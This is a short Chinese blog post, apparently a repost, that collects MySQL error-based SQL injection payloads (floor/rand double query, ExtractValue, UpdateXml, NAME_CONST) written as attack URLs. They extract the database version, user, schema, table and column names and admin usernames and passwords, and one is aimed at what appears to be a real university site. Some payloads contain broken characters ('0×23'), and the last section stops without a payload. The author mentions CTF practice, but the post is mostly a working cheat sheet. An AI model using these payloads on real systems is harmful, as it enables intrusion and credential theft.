报错注入几种语句

最新推荐文章于 2024-07-23 21:39:06 发布

DonkeyMoon

最新推荐文章于 2024-07-23 21:39:06 发布

阅读量193

点赞数

文章标签： sql

原文链接：http://www.hackdig.com/?06/hack-11347.htm

版权

1、通过floor暴错

/数据库版本/

http://www.hackdig.com/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/简单办法暴库/

http://www.hackdig.com/sql.php?id=info()

/连接用户/

http://www.hackdig.com/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/连接数据库/
http://www.hackdig.com/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/暴库/
http://www.hackdig.com/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/暴表/
http://www.hackdig.com/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/暴字段/
http://www.hackdig.com/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/暴内容/
http://www.hackdig.com/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0×23,username,0x3a,password,0×23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

2、ExtractValue(有长度限制,最长32位)

http://www.hackdig.com/sql.php?id=1+and extractvalue(1, concat(0x7e, (select @@version),0x7e))
http://www.hackdig.com/sql.php?id=1+and extractvalue(1, concat(0x7e,(SELECT distinct concat(0×23,username,0x3a,password,0×23) FROM admin limit 0,1)))

3、UpdateXml(有长度限制,最长32位)

http://www.hackdig.com/sql.php?id=1+and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)

http://www.hackdig.com/sql.php?id=1+and updatexml(1,concat(0x7e,(SELECT distinct concat(0×23,username,0x3a,password,0×23) FROM admin limit 0,1),0x7e),1)

4、NAME_CONST(适用于低版本)

http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)–

5、Error based Double Query Injection

(http://www.vaibs.in/error-based-double-query-injection/)

/数据库版本/

傻傻的我以后只有updatexml报错注入，但是最大输出只有32位，有的题目不能输出完整，就去搜了下，果真我还是个弟弟。

DonkeyMoon

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
报错注入几种语句

1、通过floor暴错/数据库版本/http://www.hackdig.com/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(r...
复制链接

扫一扫